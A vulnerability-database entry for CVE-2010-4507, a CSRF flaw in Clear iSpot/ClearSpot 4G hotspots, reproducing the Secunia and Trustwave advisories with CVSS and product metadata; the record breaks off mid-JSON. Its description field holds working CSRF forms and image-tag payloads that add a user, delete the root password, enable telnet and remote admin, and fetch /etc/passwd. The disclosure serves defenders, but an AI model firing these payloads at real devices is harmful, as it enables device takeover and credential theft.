Search criteria
4 vulnerabilities found for ispot by clear
VAR-201012-0295
Vulnerability from variot - Updated: 2023-12-18 13:53Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi. Clear iSpot and Clearspot are prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible. The following versions are affected: iSpot 2.0.0.0 (R1679) Clearspot 2.0.0.0 (R1512) and 2.0.0.0 (R1786). ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial: http://secunia.com/products/corporate/vim/
TITLE: Clear iSpot and Clear Clearspot Cross-Site Request Forgery Vulnerability
SECUNIA ADVISORY ID: SA42590
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42590/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42590
RELEASE DATE: 2010-12-26
DISCUSS ADVISORY: http://secunia.com/advisories/42590/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/42590/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42590
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Clear iSpot and Clear Clearspot, which can be exploited by malicious people to conduct cross-site request forgery attacks.
The application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests. This can be exploited to e.g. remove the root password or enable telnet by tricking a logged-in administrator into visiting a malicious web site.
The vulnerabilities are reported in Clear iSpot version 2.0.0.0, firmware version 1.9.9.4 and Clear Clearspot version 2.0.0.0, firmware version 1.9.9.4.
SOLUTION: Do not browse untrusted web sites or follow untrusted links while being logged-in to the application.
PROVIDED AND/OR DISCOVERED BY: Matthew Jakubowski, Trustwave's SpiderLabs
ORIGINAL ADVISORY: https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Trustwave's SpiderLabs Security Advisory TWSL2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt
Published: 2010-12-10 Version: 1.0
Vendor: Clear (http://www.clear.com http://www.clear.com/) Products: iSpot / ClearSpot 4G (http://www.clear.com/devices) Versions affected: The observed behavior the result of a design choice, and may be present on multiple versions.
iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)] Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)] 2.0.0.0 [R1786 (Aug 4 2010 20:09:06)] Firmware Version : 1.9.9.4 Hardware Version : R051.2 Device Name : IMW-C615W Device Manufacturer : INFOMARK (http://infomark.co.kr http://infomark.co.kr/)
Product Description: iSpot and ClearSpot 4G are portable 4G devices, that allow users to share and broadcast their own personal WiFi network. The device connects up to 8 clients at the same time, on the same 4G connection.
Credit: Matthew Jakubowski of Trustwave's SpiderLabs
CVE: CVE-2010-4507
Finding: These devices are susceptible to Cross-Site Request Forgery (CSRF). An attacker that is able to coerce a ClearSpot / iSpot user into following a link can arbitrarily execute system commands on the device. This level of access also provides a device's client-side SSL certificates, which are used to perform device authentication. This could lead to a compromise of ClearWire accounts as well as other personal information.
Add new user:
>or
Remove root password:
>or
Enable remote administration access:
>or
Enable telnet if not already enabled:
>or
Allow remote telnet access:
>or
Once compromised, it is possible to download any file from the devices using the following method.
Download /etc/passwd file:
or
Vendor Response: No official response is available at the time of release.
Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation.
Vendor Communication Timeline: 8/26/10 - Vendor contact initiated. 9/30/10 - Vulnerability details provided to vendor. 12/3/10 - Notified vendor of release date. No workaround or patch provided. 12/10/10 - Advisory published.
Revision History: 1.0 Initial publication
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit
https://www.trustwave.com https://www.trustwave.com/
About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201012-0295",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "clearspot",
"scope": "eq",
"trust": 2.4,
"vendor": "clear",
"version": "1.9.9.4"
},
{
"model": "ispot",
"scope": "eq",
"trust": 2.4,
"vendor": "clear",
"version": "1.9.9.4"
},
{
"model": "clearspot",
"scope": "eq",
"trust": 1.6,
"vendor": "clear",
"version": "2.0.0.0"
},
{
"model": "ispot",
"scope": "eq",
"trust": 1.3,
"vendor": "clear",
"version": "2.0.0.0"
},
{
"model": "clearspot",
"scope": "eq",
"trust": 0.8,
"vendor": "clear",
"version": "2.0.0.0 r1512 and r1786"
},
{
"model": "ispot",
"scope": "eq",
"trust": 0.8,
"vendor": "clear",
"version": "2.0.0.0 r1679"
}
],
"sources": [
{
"db": "BID",
"id": "45373"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003488"
},
{
"db": "NVD",
"id": "CVE-2010-4507"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-370"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:clear:ispot_firmware:1.9.9.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:clear:ispot:2.0.0.0:r1679:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:clear:clearspot_firmware:1.9.9.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:clear:clearspot:2.0.0.0:r1512:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:clear:clearspot:2.0.0.0:r1786:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2010-4507"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Matthew Jakubowski",
"sources": [
{
"db": "BID",
"id": "45373"
}
],
"trust": 0.3
},
"cve": "CVE-2010-4507",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2010-4507",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-47112",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2010-4507",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201012-370",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-47112",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-47112"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003488"
},
{
"db": "NVD",
"id": "CVE-2010-4507"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-370"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi. Clear iSpot and Clearspot are prone to a cross-site request-forgery vulnerability. \nExploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible. \nThe following versions are affected:\niSpot 2.0.0.0 (R1679)\nClearspot 2.0.0.0 (R1512) and 2.0.0.0 (R1786). ----------------------------------------------------------------------\n\n\nSecure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). \n\nRequest a free trial: \nhttp://secunia.com/products/corporate/vim/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nClear iSpot and Clear Clearspot Cross-Site Request Forgery\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA42590\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/42590/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=42590\n\nRELEASE DATE:\n2010-12-26\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/42590/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/42590/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=42590\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Clear iSpot and Clear Clearspot,\nwhich can be exploited by malicious people to conduct cross-site\nrequest forgery attacks. \n\nThe application allows users to perform certain actions via HTTP\nrequests without making proper validity checks to verify the\nrequests. This can be exploited to e.g. remove the root password or\nenable telnet by tricking a logged-in administrator into visiting a\nmalicious web site. \n\nThe vulnerabilities are reported in Clear iSpot version 2.0.0.0,\nfirmware version 1.9.9.4 and Clear Clearspot version 2.0.0.0,\nfirmware version 1.9.9.4. \n\nSOLUTION:\nDo not browse untrusted web sites or follow untrusted links while\nbeing logged-in to the application. \n\nPROVIDED AND/OR DISCOVERED BY:\nMatthew Jakubowski, Trustwave\u0027s SpiderLabs\n\nORIGINAL ADVISORY:\nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Trustwave\u0027s SpiderLabs Security Advisory TWSL2010-008:\nClear iSpot/Clearspot CSRF Vulnerabilities\n\nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt\n\nPublished: 2010-12-10 Version: 1.0\n\nVendor: Clear (http://www.clear.com \u003chttp://www.clear.com/\u003e)\nProducts: iSpot / ClearSpot 4G (http://www.clear.com/devices)\nVersions affected:\nThe observed behavior the result of a design choice, and may be present\non multiple versions. \n\niSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)]\nClearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)]\n 2.0.0.0 [R1786 (Aug 4 2010 20:09:06)]\nFirmware Version : 1.9.9.4\nHardware Version : R051.2\nDevice Name : IMW-C615W\nDevice Manufacturer : INFOMARK (http://infomark.co.kr\n\u003chttp://infomark.co.kr/\u003e)\n\nProduct Description:\niSpot and ClearSpot 4G are portable 4G devices, that allow users to share\nand broadcast their own personal WiFi network. The device connects up to 8\nclients at the same time, on the same 4G connection. \n\nCredit: Matthew Jakubowski of Trustwave\u0027s SpiderLabs\n\nCVE: CVE-2010-4507\n\nFinding:\nThese devices are susceptible to Cross-Site Request Forgery (CSRF). \nAn attacker that is able to coerce a ClearSpot / iSpot user into\nfollowing a link can arbitrarily execute system commands on the device. This level\nof access also provides a device\u0027s client-side SSL certificates, which are\nused to perform device authentication. This could lead to a compromise of\nClearWire accounts as well as other personal information. \n\nAdd new user:\n\u003cform method=\"post\" action=\"http://192.168.1.1/cgi-bin/webmain.cgi\"\n\u003chttp://192.168.1.1/cgi-bin/webmain.cgi%22\u003e\u003e\n\u003cinput type=\"hidden\" name=\"act\" value=\"act_cmd_result\"\u003e\n\u003cinput type=\"hidden\" name=\"cmd\" value=\"adduser -S jaku\"\u003e\n\u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nor\n\n\u003cimg\nsrc=\u0027http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result\u0026cmd=adduser%\n20-S%20jaku\u0027\u003e\n\nRemove root password:\n\u003cform method=\"post\" action=\"http://192.168.1.1/cgi-bin/webmain.cgi\"\n\u003chttp://192.168.1.1/cgi-bin/webmain.cgi%22\u003e\u003e\n\u003cinput type=\"hidden\" name=\"act\" value=\"act_cmd_result\"\u003e\n\u003cinput type=\"hidden\" name=\"cmd\" value=\"passwd -d root\"\u003e\n\u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nor\n\n\u003cimg\nsrc=\u0027http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result\u0026cmd=passwd%2\n0-d%20root\u0027\u003e\n\nEnable remote administration access:\n\u003cform method=\"post\" action=\"http://192.168.1.1/cgi-bin/webmain.cgi\"\n\u003chttp://192.168.1.1/cgi-bin/webmain.cgi%22\u003e\u003e\n\u003cinput type=\"hidden\" name=\"act\" value=\"act_network_set\"\u003e\n\u003cinput type=\"hidden\" name=\"enable_remote_access\" value=\"YES\"\u003e\n\u003cinput type=\"hidden\" name=\"remote_access_port\" value=\"80\"\u003e\n\u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nor\n\n\u003cimg\nsrc=\u0027http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set\u0026enable_remo\nte_access=YES\u0026remote_access_port=80\u0027\u003e\n\nEnable telnet if not already enabled:\n\n\u003cform method=\"post\" action=\"http://192.168.1.1/cgi-bin/webmain.cgi\"\n\u003chttp://192.168.1.1/cgi-bin/webmain.cgi%22\u003e\u003e\n\u003cinput type=\"hidden\" name=\"act\" value=\"act_set_wimax_etc_config\"\u003e\n\u003cinput type=\"hidden\" name=\"ENABLE_TELNET\" value=\"YES\"\u003e\n\u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nor\n\n\u003cimg\nsrc=\u0027http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config\u0026EN\nABLE_TELNET=YES\u0027\u003e\n\nAllow remote telnet access:\n\u003cform method=\"post\" action=\"http://192.168.1.1/cgi-bin/webmain.cgi\"\n\u003chttp://192.168.1.1/cgi-bin/webmain.cgi%22\u003e\u003e\n\u003cinput type=\"hidden\" name=\"act\" value=\"act_network_set\"\u003e\n\u003cinput type=\"hidden\" name=\"add_enable\" value=\"YES\"\u003e\n\u003cinput type=\"hidden\" name=\"add_host_ip\" value=\"1\"\u003e\n\u003cinput type=\"hidden\" name=\"add_port\" value=\"23\"\u003e\n\u003cinput type=\"hidden\" name=\"add_protocol\" value=\"BOTH\"\u003e\n\u003cinput type=\"hidden\" name=\"add_memo\" value=\"admintelnet\"\u003e\n\u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nor\n\n\u003cimg\nsrc=\u0027http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set\u0026add_enable=\nYES\u0026add_host_ip=1\u0026add_port=23\u0026add_protocol=both\u0026add_memo=admintelnet\u0027\u003e\n\nOnce compromised, it is possible to download any file from the devices\nusing\nthe following method. \n\nDownload /etc/passwd file:\n\u003cform method=\"post\" action=\"http://192.168.1.1/cgi-bin/upgrademain.cgi\n\u003chttp://192.168.1.1/cgi-bin/upgrademain.cgi\u003e \"\u003e\n\u003cinput type=\"hidden\" name=\"act\" value=\"act_file_download\"\u003e\n\u003cinput type=\"hidden\" name=\"METHOD\" value=\"PATH\"\u003e\n\u003cinput type=\"hidden\" name=\"FILE_PATH\" value=\"/etc/passwd\"\u003e\n\u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nor\n\n\u003cimg\nsrc=\u0027http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_download\u0026METHO\nD=PATH\u0026FILE_PATH=/etc/passwd\u0027\u003e\n\nVendor Response:\nNo official response is available at the time of release. \n\nRemediation Steps:\nNo patch currently exists for this issue. To limit exposure,\nnetwork access to these devices should be limited to authorized\npersonnel through the use of Access Control Lists and proper\nnetwork segmentation. \n\nVendor Communication Timeline:\n8/26/10 - Vendor contact initiated. \n9/30/10 - Vulnerability details provided to vendor. \n12/3/10 - Notified vendor of release date. No workaround or patch provided. \n12/10/10 - Advisory published. \n\nRevision History:\n1.0 Initial publication\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit\n\nhttps://www.trustwave.com \u003chttps://www.trustwave.com/\u003e\n\nAbout Trustwave\u0027s SpiderLabs:\nSpiderLabs is the advance security team at Trustwave responsible for\nincident response and forensics, ethical hacking and application security\ntests for Trustwave\u0027s clients. SpiderLabs has responded to hundreds of\nsecurity incidents, performed thousands of ethical hacking exercises and\ntested the security of hundreds of business applications for Fortune 500\norganizations. For more information visit\nhttps://www.trustwave.com/spiderlabs\n\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\n\n\n\n\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-4507"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003488"
},
{
"db": "BID",
"id": "45373"
},
{
"db": "VULHUB",
"id": "VHN-47112"
},
{
"db": "PACKETSTORM",
"id": "97035"
},
{
"db": "PACKETSTORM",
"id": "96629"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-47112",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-47112"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2010-4507",
"trust": 2.9
},
{
"db": "EXPLOIT-DB",
"id": "15728",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "42590",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003488",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201012-370",
"trust": 0.7
},
{
"db": "BID",
"id": "45373",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "96629",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-70383",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-47112",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "97035",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-47112"
},
{
"db": "BID",
"id": "45373"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003488"
},
{
"db": "PACKETSTORM",
"id": "97035"
},
{
"db": "PACKETSTORM",
"id": "96629"
},
{
"db": "NVD",
"id": "CVE-2010-4507"
},
{
"db": "CNNVD",
"id": "CNNVD-201012-370"
}
]
},
"id": "VAR-201012-0295",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-47112"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:53:39.491000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Clear Spot",
"trust": 0.8,
"url": "http://www.clear.com/devices/spot"
}
],
"sources": [
{
